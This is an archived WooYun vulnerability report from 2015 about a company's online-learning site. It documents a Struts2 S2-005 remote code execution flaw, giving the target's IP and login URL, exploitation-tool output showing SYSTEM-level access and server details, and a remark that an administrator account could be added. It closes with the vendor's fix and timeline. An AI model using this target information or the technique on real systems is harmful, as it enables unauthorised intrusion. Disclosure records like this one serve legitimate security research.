乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-27: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-07: 厂商已经修复漏洞并主动公开,细节向公众公开
RT
http://learning.ufh.com.cn
Target: http://114.215.101.86:8080/login.doUseage: S2-005 Whoami: nt authority\systemWebPath: D:\lms\hmjOS.Name: Windows 2003OS.Version: 5.2Java.Home: C:\Program Files (x86)\Java\jre1.6.0_05Java.Version: 1.6.0_05OS.arch: x86User.Name: SYSTEMUser.Home: C:\Documents and Settings\Default UserUser.Dir: C:\Program Files (x86)\Apache Software Foundation\Tomcat 6.0Java.Class.Path: C:\Program Files (x86)\Apache Software Foundation\Tomcat 6.0\bin\bootstrap.jar;C:\Program Files (x86)\Apache Software Foundation\Tomcat 6.0\bin\tomcat-juli.jarJava.IO.Tmpdir: C:\Program Files (x86)\Apache Software Foundation\Tomcat 6.0\temp
内网ip
Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 10.163.166.196 Subnet Mask . . . . . . . . . . . : 255.255.240.0 Default Gateway . . . . . . . . . :
外网ip,system权限,直接添加账号到管理员组
a
升级版本
危害等级:低
漏洞Rank:5
确认时间:2015-11-27 09:19
公司的在线学习网站,没有核心业务数据
2015-12-07:服务器中毒,服务商已经修复此漏洞,感谢Wooyun和白帽的帮助